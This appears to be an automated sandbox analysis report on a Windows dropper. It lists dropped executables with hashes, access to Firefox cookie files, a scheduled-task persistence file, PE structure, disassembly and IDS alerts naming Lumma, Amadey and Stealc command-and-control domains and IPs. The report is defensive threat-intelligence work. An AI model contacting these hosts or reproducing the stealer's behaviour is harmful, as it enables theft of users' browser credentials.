                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.....x.....@.................................W...k............................{1..............................z1..................................................... . ............................@....rsrc...............................@....idata ............................@...odogmioi..*.......*.................@...qyfccaeh......1.......-.............@....taggant.0....1.."....-.............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                          Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Users\user\Documents\HIDGCFBFBF.exe

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):3008512
                                                                                                                                                                                                                                                          Entropy (8bit):6.58783107820754
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:49152:XTJjZdsdiRYaCGZPNYWJuwrAZRvE5JitgU7sT/8az/tBBTgmEg:XTJjZdsdiRYTaNYWJuwsLvEnpU7Ta/J0
                                                                                                                                                                                                                                                          MD5:EB5E8AF364226452A7B60CFDF34CE69B
                                                                                                                                                                                                                                                          SHA1:CC80C76F29701DB1DC2862D0BA28BD6A15495DB1
                                                                                                                                                                                                                                                          SHA-256:C0645847E49AB8E30B22D510DB3B31C8CB9E7301FA599C2CDACF4978F340ABC8
                                                                                                                                                                                                                                                          SHA-512:62E312E1A75B8ACD276B7FB6BFAFB9DC4568F81415931B860CB5354BA3C3E0A0F0F2DFA683AABC69569E6B0E7D0BD830259B65E63AF09EA0F3EC43BA58FB46F4
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.....x.....@.................................W...k............................{1..............................z1..................................................... . ............................@....rsrc...............................@....idata ............................@...odogmioi..*.......*.................@...qyfccaeh......1.......-.............@....taggant.0....1.."....-.............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\Windows\Tasks\skotes.job

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):284
                                                                                                                                                                                                                                                          Entropy (8bit):3.396874582014897
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:DS6tXflNeRKUEZ+lX1CGdKUe6tPjgsW2YRZuy0lHt4ldt0:DxZf2RKQ1CGAFAjzvYRQVHedt0
                                                                                                                                                                                                                                                          MD5:0D301D0649AF36DB7D29C7A9A7EC11FF
                                                                                                                                                                                                                                                          SHA1:015856D5F45190F771AFB45DD4B0BED5BE53DFF1
                                                                                                                                                                                                                                                          SHA-256:57958ABA2A4D124556373FDA5E43B4DE06E49D55CA9146C806548392E0C4A585
                                                                                                                                                                                                                                                          SHA-512:78A8CCC1C26557B3F86C47EDC19E3FB884EAB00725484406FB52DC302DAA27B511708C2C4CBAEE7AFE3A218D1ED754D075F1677E9903201A5FA6678CED866916
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:........-..B.....F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................

                                                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                          Entropy (8bit):7.996291906862608
                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                          File name:Tii6ue74NB.exe
                                                                                                                                                                                                                                                          File size:7'292'928 bytes
                                                                                                                                                                                                                                                          MD5:61fd8b1c2c9984f10c6b263504f6e794
                                                                                                                                                                                                                                                          SHA1:f69d67ce66a80d1dcd0e5e634fcc3f8cc9cf7339
                                                                                                                                                                                                                                                          SHA256:da05563897f4d6dc3e18c20da49078f103dbeee1c8ba9ddd01e7e7d8b0077fca
                                                                                                                                                                                                                                                          SHA512:10aa7e0769915aabf141c1e2e28498ed8afc146dd48405243e056a8f031f99c36e99768238abe2d0df9b52ad5c76827091ba412d81342f8e03b02e54d728d545
                                                                                                                                                                                                                                                          SSDEEP:196608:yFXrn2YgzkAt5SZbVbH4r/3QJiYgYipoVJiI:G72TzkAt2Vb0PQIlZ6VJi
                                                                                                                                                                                                                                                          TLSH:487633A3E7F09016C5B9877175E305EB17ACB7A02C700AD3EE1E37099424AE66637397
                                                                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.

                                                                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                                                                          Icon Hash:3b6120282c4c5a1f

                                                                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Entrypoint:0x406a60
                                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                          Time Stamp:0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
                                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                                          OS Version Major:10
                                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                                          File Version Major:10
                                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                                          Subsystem Version Major:10
                                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                                          Import Hash:646167cce332c1c252cdcb1839e0cf48

                                                                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                                          call 00007FA1C4D83125h
                                                                                                                                                                                                                                                          jmp 00007FA1C4D82A35h
                                                                                                                                                                                                                                                          push 00000058h
                                                                                                                                                                                                                                                          push 004072B8h
                                                                                                                                                                                                                                                          call 00007FA1C4D831C7h
                                                                                                                                                                                                                                                          xor ebx, ebx
                                                                                                                                                                                                                                                          mov dword ptr [ebp-20h], ebx
                                                                                                                                                                                                                                                          lea eax, dword ptr [ebp-68h]
                                                                                                                                                                                                                                                          push eax
                                                                                                                                                                                                                                                          call dword ptr [0040A184h]
                                                                                                                                                                                                                                                          mov dword ptr [ebp-04h], ebx
                                                                                                                                                                                                                                                          mov eax, dword ptr fs:[00000018h]
                                                                                                                                                                                                                                                          mov esi, dword ptr [eax+04h]
                                                                                                                                                                                                                                                          mov edi, ebx
                                                                                                                                                                                                                                                          mov edx, 004088ACh
                                                                                                                                                                                                                                                          mov ecx, esi
                                                                                                                                                                                                                                                          xor eax, eax
                                                                                                                                                                                                                                                          lock cmpxchg dword ptr [edx], ecx
                                                                                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                                                                                          je 00007FA1C4D82A4Ah
                                                                                                                                                                                                                                                          cmp eax, esi
                                                                                                                                                                                                                                                          jne 00007FA1C4D82A39h
                                                                                                                                                                                                                                                          xor esi, esi
                                                                                                                                                                                                                                                          inc esi
                                                                                                                                                                                                                                                          mov edi, esi
                                                                                                                                                                                                                                                          jmp 00007FA1C4D82A42h
                                                                                                                                                                                                                                                          push 000003E8h
                                                                                                                                                                                                                                                          call dword ptr [0040A188h]
                                                                                                                                                                                                                                                          jmp 00007FA1C4D82A09h
                                                                                                                                                                                                                                                          xor esi, esi
                                                                                                                                                                                                                                                          inc esi
                                                                                                                                                                                                                                                          cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                                                                          jne 00007FA1C4D82A3Ch
                                                                                                                                                                                                                                                          push 0000001Fh
                                                                                                                                                                                                                                                          call 00007FA1C4D82F5Bh
                                                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                                                          jmp 00007FA1C4D82A6Ch
                                                                                                                                                                                                                                                          cmp dword ptr [004088B0h], ebx
                                                                                                                                                                                                                                                          jne 00007FA1C4D82A5Eh
                                                                                                                                                                                                                                                          mov dword ptr [004088B0h], esi
                                                                                                                                                                                                                                                          push 004010C4h
                                                                                                                                                                                                                                                          push 004010B8h
                                                                                                                                                                                                                                                          call 00007FA1C4D82B86h
                                                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                                                                                          je 00007FA1C4D82A49h
                                                                                                                                                                                                                                                          mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                                                                                                                                                          mov eax, 000000FFh
                                                                                                                                                                                                                                                          jmp 00007FA1C4D82B69h
                                                                                                                                                                                                                                                          mov dword ptr [004081E4h], esi
                                                                                                                                                                                                                                                          cmp dword ptr [004088B0h], esi
                                                                                                                                                                                                                                                          jne 00007FA1C4D82A4Dh
                                                                                                                                                                                                                                                          push 004010B4h
                                                                                                                                                                                                                                                          push 004010ACh
                                                                                                                                                                                                                                                          call 00007FA1C4D83115h
                                                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                                                          pop ecx
                                                                                                                                                                                                                                                          mov dword ptr [000088B0h], 00000000h

                                                                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xa28c0xb4.idata
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x6ec1f0.rsrc
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x6f90000x888.reloc
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x14100x54.text
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x10080x40.text
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0xa0000x288.idata
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                          Sections

                                                                                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                          .text0x10000x63140x6400b0b66b32f4ca82e2e157c51b24da0be7False0.5744140625data6.314163792045976IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .data0x80000x1a480x2007b9890a93c0516bb070e1170cfde54d5False0.609375data4.970639543960129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                          .idata0xa0000x10520x120067ce48bf2e7c8fe3321ca7aa188f77e2False0.4140625data5.025949912909207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .rsrc0xc0000x6ed0000x6ec20012508bba6a56d39786f0cf1273a767dfunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                          .reloc0x6f90000x8880xa006025c825c4098ef081ac8ee3c8d5dd22False0.746484375data6.222637930812128IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                          Resources

                                                                                                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                          AVI0xcb300x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States0.2713099474665311
                                                                                                                                                                                                                                                          RT_ICON0xf94c0x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3225609756097561
                                                                                                                                                                                                                                                          RT_ICON0xffb40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.41263440860215056
                                                                                                                                                                                                                                                          RT_ICON0x1029c0x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.4569672131147541
                                                                                                                                                                                                                                                          RT_ICON0x104840x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5574324324324325
                                                                                                                                                                                                                                                          RT_ICON0x105ac0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.6223347547974414
                                                                                                                                                                                                                                                          RT_ICON0x114540x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7369133574007221
                                                                                                                                                                                                                                                          RT_ICON0x11cfc0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.783410138248848
                                                                                                                                                                                                                                                          RT_ICON0x123c40x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.3829479768786127
                                                                                                                                                                                                                                                          RT_ICON0x1292c0xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0004662673505254
                                                                                                                                                                                                                                                          RT_ICON0x203000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5300829875518672
                                                                                                                                                                                                                                                          RT_ICON0x228a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6137429643527205
                                                                                                                                                                                                                                                          RT_ICON0x239500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.703688524590164
                                                                                                                                                                                                                                                          RT_ICON0x242d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.425531914893617
                                                                                                                                                                                                                                                          RT_DIALOG0x247400x2f2dataEnglishUnited States0.4389920424403183
                                                                                                                                                                                                                                                          RT_DIALOG0x24a340x35cdataRussianRussia0.44534883720930235
                                                                                                                                                                                                                                                          RT_DIALOG0x24d900x1b0dataEnglishUnited States0.5625
                                                                                                                                                                                                                                                          RT_DIALOG0x24f400x1b4dataRussianRussia0.573394495412844
                                                                                                                                                                                                                                                          RT_DIALOG0x250f40x166dataEnglishUnited States0.5223463687150838
                                                                                                                                                                                                                                                          RT_DIALOG0x2525c0x168dataRussianRussia0.5361111111111111
                                                                                                                                                                                                                                                          RT_DIALOG0x253c40x1c0dataEnglishUnited States0.5446428571428571
                                                                                                                                                                                                                                                          RT_DIALOG0x255840x1e0dataRussianRussia0.55
                                                                                                                                                                                                                                                          RT_DIALOG0x257640x130dataEnglishUnited States0.5526315789473685
                                                                                                                                                                                                                                                          RT_DIALOG0x258940x150dataRussianRussia0.5416666666666666
                                                                                                                                                                                                                                                          RT_DIALOG0x259e40x120dataEnglishUnited States0.5763888888888888
                                                                                                                                                                                                                                                          RT_DIALOG0x25b040x122dataRussianRussia0.5793103448275863
                                                                                                                                                                                                                                                          RT_STRING0x25c280x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States0.6214285714285714
                                                                                                                                                                                                                                                          RT_STRING0x25cb40x86Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0RussianRussia0.7164179104477612
                                                                                                                                                                                                                                                          RT_STRING0x25d3c0x520dataEnglishUnited States0.4032012195121951
                                                                                                                                                                                                                                                          RT_STRING0x2625c0x52edataRussianRussia0.39441930618401205
                                                                                                                                                                                                                                                          RT_STRING0x2678c0x5ccdataEnglishUnited States0.36455525606469
                                                                                                                                                                                                                                                          RT_STRING0x26d580x592dataRussianRussia0.4011220196353436
                                                                                                                                                                                                                                                          RT_STRING0x272ec0x4b0dataEnglishUnited States0.385
                                                                                                                                                                                                                                                          RT_STRING0x2779c0x4b2dataRussianRussia0.3910149750415973
                                                                                                                                                                                                                                                          RT_STRING0x27c500x44adataEnglishUnited States0.3970856102003643
                                                                                                                                                                                                                                                          RT_STRING0x2809c0x43edataRussianRussia0.4567219152854512
                                                                                                                                                                                                                                                          RT_STRING0x284dc0x3cedataEnglishUnited States0.36858316221765913
                                                                                                                                                                                                                                                          RT_STRING0x288ac0x2fcdataRussianRussia0.4424083769633508
                                                                                                                                                                                                                                                          RT_RCDATA0x28ba80x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                                                                                                                                                                          RT_RCDATA0x28bb00x6ce513Microsoft Cabinet archive data, many, 7136531 bytes, 2 files, at 0x2c +A "i9z22.exe" +A "4l693L.exe", ID 1518, number 1, 221 datablocks, 0x1503 compressionRussianRussia0.9998893737792969
                                                                                                                                                                                                                                                          RT_RCDATA0x6f70c40x4dataRussianRussia3.0
                                                                                                                                                                                                                                                          RT_RCDATA0x6f70c80x24dataRussianRussia0.8055555555555556
                                                                                                                                                                                                                                                          RT_RCDATA0x6f70ec0x7ASCII text, with no line terminatorsRussianRussia2.142857142857143
                                                                                                                                                                                                                                                          RT_RCDATA0x6f70f40x7ASCII text, with no line terminatorsRussianRussia2.142857142857143
                                                                                                                                                                                                                                                          RT_RCDATA0x6f70fc0x4dataRussianRussia3.0
                                                                                                                                                                                                                                                          RT_RCDATA0x6f71000xbASCII text, with no line terminatorsEnglishUnited States1.7272727272727273
                                                                                                                                                                                                                                                          RT_RCDATA0x6f710c0x4dataRussianRussia3.0
                                                                                                                                                                                                                                                          RT_RCDATA0x6f71100xadataEnglishUnited States1.8
                                                                                                                                                                                                                                                          RT_RCDATA0x6f711c0x4dataRussianRussia3.0
                                                                                                                                                                                                                                                          RT_RCDATA0x6f71200x6dataRussianRussia2.3333333333333335
                                                                                                                                                                                                                                                          RT_RCDATA0x6f71280x7ASCII text, with no line terminatorsRussianRussia2.142857142857143
                                                                                                                                                                                                                                                          RT_RCDATA0x6f71300x7ASCII text, with no line terminatorsEnglishUnited States2.142857142857143
                                                                                                                                                                                                                                                          RT_GROUP_ICON0x6f71380xbcdataEnglishUnited States0.6117021276595744
                                                                                                                                                                                                                                                          RT_VERSION0x6f71f40x408dataEnglishUnited States0.42441860465116277
                                                                                                                                                                                                                                                          RT_VERSION0x6f75fc0x410dataRussianRussia0.46826923076923077
                                                                                                                                                                                                                                                          RT_MANIFEST0x6f7a0c0x7e2XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3761149653121903

                                                                                                                                                                                                                                                          Imports

                                                                                                                                                                                                                                                          DLLImport
                                                                                                                                                                                                                                                          ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                                                                                                                                                                                                                                          KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
                                                                                                                                                                                                                                                          GDI32.dllGetDeviceCaps
                                                                                                                                                                                                                                                          USER32.dllSetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
                                                                                                                                                                                                                                                          msvcrt.dll_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
                                                                                                                                                                                                                                                          COMCTL32.dll
                                                                                                                                                                                                                                                          Cabinet.dll
                                                                                                                                                                                                                                                          VERSION.dllGetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA

                                                                                                                                                                                                                                                          Possible Origin

                                                                                                                                                                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                          EnglishUnited States
                                                                                                                                                                                                                                                          RussianRussia

                                                                                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                                                                                          Suricata IDS Alerts

                                                                                                                                                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                          2024-12-19T14:20:16.597605+01002058378ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat)1192.168.2.4494421.1.1.153UDP
                                                                                                                                                                                                                                                          2024-12-19T14:20:16.826551+01002058364ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat)1192.168.2.4642441.1.1.153UDP
                                                                                                                                                                                                                                                          2024-12-19T14:20:18.555000+01002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.449730185.215.113.4380TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:18.745239+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.449731104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:18.745239+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:20.143513+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449731104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:20.143513+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:20.560952+01002058365ET MALWARE Observed Win32/Lumma Stealer Related Domain (grannyejh .lat in TLS SNI)1192.168.2.449733104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:20.560952+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.64.80443TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:23.364724+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.44973531.41.244.1180TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:25.929461+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449737185.215.113.20680TCP
                                                                                                                                                                                                                                                          2024-12-19T14:20:26.410156+01002044244ET MALWARE Win32/Stealc Requesting browsers Config from C21192.168.2.449737185.215.113.20680TCP
